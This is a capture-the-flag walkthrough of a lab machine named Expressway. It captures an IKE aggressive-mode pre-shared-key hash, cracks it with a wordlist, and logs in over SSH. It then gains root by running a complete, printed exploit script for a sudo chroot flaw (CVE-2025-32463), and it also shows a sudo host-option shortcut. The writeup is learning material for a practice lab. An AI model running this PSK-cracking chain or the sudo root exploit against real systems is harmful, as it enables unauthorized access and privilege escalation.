Expressway - Easy

1st Step :

using Nmap I got port of UDP using -sU

sudo nmap -sV -T3 -vv -sU -Pn -p 500 10.10.11.87

2nd Step : (Psk CAPTURE ATTACK)

here you get to know that ISAKMP protocol is running which is a protocol that runs for CIA traids .

Brief-

Psec is widely recognized as the principal technology for securing communications between networks (LAN-to-LAN) and from remote users to the network gateway (remote access), serving as the backbone for enterprise VPN solutions.

The establishment of a security association (SA) between two points is managed by IKE, which operates under the umbrella of ISAKMP, a protocol designed for the authentication and key exchange

PORT    STATE SERVICE REASON     VERSION
500/udp open  isakmp? script-set

3rd Step :

from here we use main mode -M for service enumeration and got nothing important

sudo ike-scan -M 10.10.11.87

OUTPUT: 
Starting ike-scan 1.9.6 with 1 hosts (<http://www.nta-monitor.com/tools/ike-scan/>)

Ending ike-scan 1.9.6: 1 hosts scanned in 2.452 seconds (0.41 hosts/sec).  0 returned handshake; 0 returned notify

So we did aggressive scan -A to get more detailed output

 sudo ike-scan -A 10.10.11.87

Starting ike-scan 1.9.6 with 1 hosts (<http://www.nta-monitor.com/tools/ike-scan/>)
10.10.11.87	Aggressive Mode Handshake returned HDR=(CKY-R=ba7210a7a085810b) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, [email protected]) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.312 seconds (3.21 hosts/sec).  1 returned handshake; 0 returned notify

in here, we discovered that there is a user name given in Value that is “ike” and

Vulnerability exploitation - Psk Capture Attack-

Its a critical vuln that lies ike-aggressive mode design flaw unlike main mode aggressive mode transmits the identity and psk hash in plain test making it sustainable to capture and offilne cracking attacks

sudo ike-scan -A expressway --pskcrack=hash.txt 10.10.11.87

WARNING: gethostbyname failed for "expressway" - target ignored: Success
Starting ike-scan 1.9.6 with 1 hosts (<http://www.nta-monitor.com/tools/ike-scan/>)
10.10.11.87	Aggressive Mode Handshake returned HDR=(CKY-R=b1726bcf26440d63) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, [email protected]) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.351 seconds (2.85 hosts/sec).  1 returned handshake; 0 returned notify

we got our Hash text here

cat hash.txt
9df14ebe6a495d043a66be50be8abb50990af6bb136202ce6375cd538e83e307acf5a8bf3f1b0367aec447a646fdfc1b57b8247b2111d85c1676ac7949b2d8a2fadb3b86b8d922ddaf72a721fda04dd1f83e084e1d0e24b0d4679fdc70fd3c6fba6d3c517a01e733fef4d2c6c11105be0fd2dc671188d489a63bdb3b6b14b8e4:19099df3cfad32e93c13c4c5d48d6bb349bcd53dd19326b34642fbb5948ac59e2f9c4a4412e7b279ea03319e6bf64a487c0c207b870e5ed6c31665189d82fa2e6f94c48eb855f9f57584cd474b258ae3b5852e7f4341bf40bd1cc8c2c5a3bdf17fa1cec6ddaf0520ebb04b47f89d7ea02f4667da6e0457464259201131d14215:b1726bcf26440d63:28419ff81b91b003:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:c1b62afd7e1484c54681567dde89494116113e76:5a0b87ecfb77855f2619365cb1f3d3294d28c0edaefeb396e9e9c21d6393afbe:640f42f38cce7225fca8e00903591dabeab9dada

then using psk-crack we cracked the hash text getitng output as

sudo psk-crack -d rockyou.txt hash.txt 

Starting psk-crack [ike-scan 1.9.6] (<http://www.nta-monitor.com/tools/ike-scan/>)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 640f42f38cce7225fca8e00903591dabeab9dada
Ending psk-crack: 8045039 iterations in 8.794 seconds (914823.16 iterations/sec)

Output :
freakingrockstarontheroad

now here we got the pass

3rd Step :

I got the initial access using id:pass I got earlier that is -

ssh [email protected]

pass : freakingrockstarontheroad

and here you get the user flag :

cat user.txt
81118394be23db4c0ab7dd8db439c161

4th Step :

now to get the root flag you have to know what all permissons you have and by checking it you get to know that you dont have root permisson , fir that what you can do is

sudo -V 2>/dev/null | head -n 1

sudo -V  version info print karega

2>/dev/null  agar error aayi to chhupa de

| head -n 1  sirf pehli line show kare (jisme version hota hai)

Or do

which sudo

5th Step :

now from here you get the version , here you will get the version and now will get the exploit accordingly -

here you can get the exploit so take it copy it and run into the terminal -

https://github.com/kh4sh3i/CVE-2025-32463/blob/main/exploit.sh

here it the exploit code -

#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
#                  @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}

after excution you will get into root -

in terminal :

ls 
cd root 
ls 
cat root.txt

now you get the flag

root@expressway:/root# cat root.txt
128aca2fca5bea13d01970a8be00e102

SHER BOLTE!!

DIRECT ROOT ACCESS

ike@expressway:~$ sudo -h offramp.expressway.htb cat /root/root.txt
128aca2fca5bea13d01970a8be00e102

PreviousCAP - Easy NextPuppet - Advance Lab

Last updated 3 hours ago

Was this helpful?